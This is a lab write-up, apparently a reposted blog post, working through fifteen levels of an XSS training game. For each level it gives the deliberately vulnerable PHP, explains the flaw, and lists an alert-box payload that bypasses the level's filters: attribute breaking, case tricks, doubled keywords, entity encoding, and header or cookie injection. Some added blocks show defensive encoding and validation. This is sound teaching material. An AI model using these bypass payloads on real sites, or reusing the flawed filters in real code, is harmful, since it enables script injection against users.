
xssgame challenges (XSS learning) level1-15

2022-07-23 11:00:00 H3018-R

XSS source download

xssgame

Set up locally.

level1

View source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center> Welcome to :".$str."</h2>";
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/8deed969-b339-4c84-8654-b1a1e40e06de.png" width="50%"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str)."</h3>";
?>

The name variable is passed in via GET and is echoed without any filtering.

The payload is as follows:

/level1.php?name=<script>alert(1)</script>

level2

View source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value=" Search for "/>
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/688da926-8a0b-452a-9a2b-82ba919328fb.jpg"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str)."</h3>";
?>

PHP htmlspecialchars() function

The variable is passed in via GET. The heading is encoded with htmlspecialchars(), but the value of the input tag has no filtering at all, so try closing the double quote in the input tag with " and triggering an event.

onclick: JavaScript event

The onclick event fires when the object is clicked.

" onclick=alert('H3018') //

Click the input box after entering the payload.

level3

View source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value= Search for  />
</form>
</center>";
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/ee7a688a-d75e-4ed7-8a79-96e62d3127e2.png" width="15%"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str)."</h3>";
?>

The variable is passed in via GET. Here the input's value is also run through htmlspecialchars(), but the attribute is wrapped in single quotes, which htmlspecialchars() does not encode by default (ENT_QUOTES only became the default in PHP 8.1), so close the attribute with ' and trigger an event.

' onclick=alert('H3018') //
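As an added example (not code from the xssgame source or the writeup), the level3 output point rebuilt with an attribute encoder that escapes both quote characters; the function names are my own:

```php
<?php
// Added example, not part of the xssgame source. level3 puts the value in a
// single-quoted attribute but calls htmlspecialchars() with default flags, which
// before PHP 8.1 escape " but not ', so the attribute can still be closed.

// Encoder for HTML attribute values (name is my own). ENT_QUOTES escapes both
// quote characters; ENT_SUBSTITUTE keeps invalid UTF-8 from yielding an empty string.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401, 'UTF-8');
}

// The level3 form field rendered through the hardened encoder.
function render_level3_input(string $keyword): string
{
    return "<input name=keyword value='" . attr($keyword) . "'>";
}

// The level3 payload from the writeup, used here as a constructed test input.
$payload = "' onclick=alert('H3018') //";

echo render_level3_input($payload), PHP_EOL;
// Every ' in the value is now &#039;, so the attribute is never closed and the
// onclick text is just part of the string the browser shows inside the box.
```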

level4

View source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value= Search for  />
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/0d3f0d24-a861-4d20-97da-f807ea842be8.jpg"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str3)."</h3>";
?>

This builds on level2 by filtering angle brackets. Closing the double quote in the input tag to construct an event handler needs no angle brackets, so the payload still applies:

" onclick=alert('H3018') //

level5

View the source code

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value= Search for  />
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/cb30e912-eabc-4357-89eb-49e8de1b1961.jpg"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str3)."</h3>";
?>

Here the incoming variable is first converted to lowercase, then <script is replaced with <scr_ipt and on with o_n. We cannot trigger events or a script tag through either of those, but we can close the double quote and the tag, then trigger the pop-up with javascript:alert('H3018'). A javascript: URL tells the browser to execute the code that follows as JavaScript and return its result to the current page.

"><a href=javascript:alert('H3018') //

Click the link.

level6

View the source code

<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value= Search for  />
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/92847238-8dda-473f-9c04-83986de1472a.jpg"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str6)."</h3>";
?>

Compared with level5, many more filter rules were added, but the incoming string is no longer converted to lowercase, so the filters can be bypassed by changing case.

payload:

" Onclick=alert('H3018') //

"><a Href=javascript:alert('H3018') //

level7

View source code

<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value= Search for  />
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/17532328-f4cc-4bca-b283-c7f7b5a13f80.jpg" width="20%"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str6)."</h3>";
?>

Here strtolower() converts the string to lowercase, but str_replace() only deletes each matched string once (replacing it with an empty string), so we can bypass it by writing the keyword twice: oonnclick becomes onclick after one removal.

" oonnclick=alert('H3018') //
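As an added example (not code from the xssgame source or the writeup), the level7 filter chain reproduced together with a check a defender can run on such a filter: if applying it a second time still changes the output, the first pass let a token through. Function names are my own:

```php
<?php
// Added example, not part of the xssgame source. Reproduces the level7 filter
// chain and checks whether applying it once is enough: a blacklist that deletes
// a token can reassemble that same token from the characters it leaves behind.

// The level7 chain: lowercase, then delete each blacklisted word once.
function level7_filter(string $str): string
{
    $str = strtolower($str);
    foreach (['script', 'on', 'src', 'data', 'href'] as $word) {
        $str = str_replace($word, '', $str);
    }
    return $str;
}

// A removal filter is only trustworthy if a second pass changes nothing
// (idempotence). Any input that fails this check has slipped a token through.
function is_idempotent(callable $filter, string $input): bool
{
    $once = $filter($input);
    return $filter($once) === $once;
}

// Constructed inputs: an ordinary search term and the double-write from the writeup.
$samples = [
    'harmless search term',
    "\" oonnclick=alert('H3018') //",
];

foreach ($samples as $sample) {
    printf("%-32s -> %-30s idempotent: %s\n",
        $sample, level7_filter($sample),
        is_idempotent('level7_filter', $sample) ? 'yes' : 'NO');
}
// For the second input one pass turns oonnclick into onclick, and a second pass
// would strip it again, so the check reports NO. The durable fix is not a longer
// blacklist but encoding for the output context:
//   htmlspecialchars($str, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
```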

level8

View source code

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value= Add links  />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'"> link </a></center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/d2d2080f-746c-4276-9f63-585fc4fd4a9c.jpg" width="20%"></center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str7)."</h3>";
?>

Here the incoming string is strictly checked and filtered, but the href of the link inside the <center> tag is not processed by htmlspecialchars(), so we can try a javascript: URL to trigger the XSS.

Use HTML entity encoding to bypass the filter:

javascrip&#x74;:alert('H3018') //

Click the link.

level9

There is a link, so this is probably similar to the previous level.

View the source code

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value= Add links  />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href=" Your link is illegal ? Is there any !"> link </a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'"> link </a></center>';
}
?>

A check on the incoming string was added (it must contain http://), so just append http:// after the payload:

javascrip&#x74;:alert('H3018') //http://

Click the link.
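As an added example (not code from the xssgame source or the writeup), the level8/level9 link output rebuilt so that the URL is entity-decoded, checked against an allow-list of schemes at its start, and then encoded; the function names are my own:

```php
<?php
// Added example, not part of the xssgame source. level8 and level9 put user
// input into <a href> guarded by a token blacklist and, in level9, a check that
// 'http://' appears anywhere in the string. This validator (names are my own)
// decodes character references first and then requires an allow-listed scheme
// at the start of the URL.

function safe_link(string $input): ?string
{
    // The browser decodes references in attribute values before it parses the
    // URL, so validate the decoded form: javascrip&#x74;: is javascript: to it.
    $url = html_entity_decode($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // Drop ASCII control characters and whitespace, which browsers ignore in URLs.
    $url = preg_replace('/[\x00-\x20\x7F]+/', '', $url);
    $scheme = parse_url($url, PHP_URL_SCHEME);
    // Relative or malformed URLs and any non-http(s) scheme are rejected.
    if (!is_string($scheme) || !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return null;
    }
    return $url;
}

// level9's output point, rebuilt so that the href is validated and then encoded.
function render_link(string $input): string
{
    $url = safe_link($input);
    if ($url === null) {
        return '<center><BR>Your link is illegal</center>';
    }
    return '<center><BR><a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">link</a></center>';
}

// Constructed inputs: a normal link, the level8 payload, and the level9 payload
// that satisfies a contains-'http://' check but still has the wrong scheme.
$samples = [
    'http://example.com/page',
    "javascrip&#x74;:alert('H3018') //",
    "javascrip&#x74;:alert('H3018') //http://",
];
foreach ($samples as $sample) {
    echo render_link($sample), PHP_EOL;
}
```

Only the first sample is rendered as a link; the other two are rejected because their decoded scheme is javascript, regardless of where http:// appears in the string.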

level10

View the source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

The two output points of $str are no use, since they go through htmlspecialchars($str). Look at the output point of $str33 instead: it is a hidden input, so the type attribute is overridden manually as well.

keyword=&t_sort=" type="" onclick=alert('H3018') //

level11

Don't get boxed in.

View source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

Here both input strings, $str and $str00, are processed, so there is basically nothing to do with them. $str11 is not processed, however, so we use Burp (bp) to modify the Referer header to trigger the pop-up.

Referer: " type="" onclick=alert('H3018') //

level12

View the source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

Same idea as the previous level, only the injection is through the User-Agent header.

Use Burp to modify the User-Agent:

User-Agent: " type="" onclick=alert('H3018') //

level13

Doing these challenges is so much fun, hahaha.

View source code

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center> Not found and ".htmlspecialchars($str)." Relevant results .</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

Cookie injection.

Use Burp:

Cookie: user=" type="" onclick=alert('H3018') //

level14

View the source code

<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

The ng-include directive is used to include an external HTML file.

The included content becomes the child nodes of the specified element.

The value of the ng-include attribute can be an expression that returns a file name.

By default, the included file must be on the same domain.

Here we can include one of the other vulnerable pages to trigger the pop-up:

?src="level1.php?name=<img src=x onerror=alert('H3018')>"

The external script https://chao.jsanhuan.cn/angular.min.js referenced in the source is no longer accessible.

I didn't download it locally, so this payload may not work locally.

level15

View source code

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/9ec67d16-a8b9-41cd-82fa-14b0c0f96e72.gif"</center>
<?php 
echo "<h3 align=center>payload The length of :".strlen($str5)."</h3>";
?>

Here script is filtered, and spaces, slashes and tabs are replaced with &nbsp;, but a newline is not, so %0a can be used as the separator instead:

level15.php?keyword=<img%0asrc=x%0aonerror=alert('H3018')>

 

 

Original article: https://yzsam.com/2022/204/202207230437105402.html

Copyright notice: this article was written by [H3018-R]; please include a link to the original when reposting. Thanks.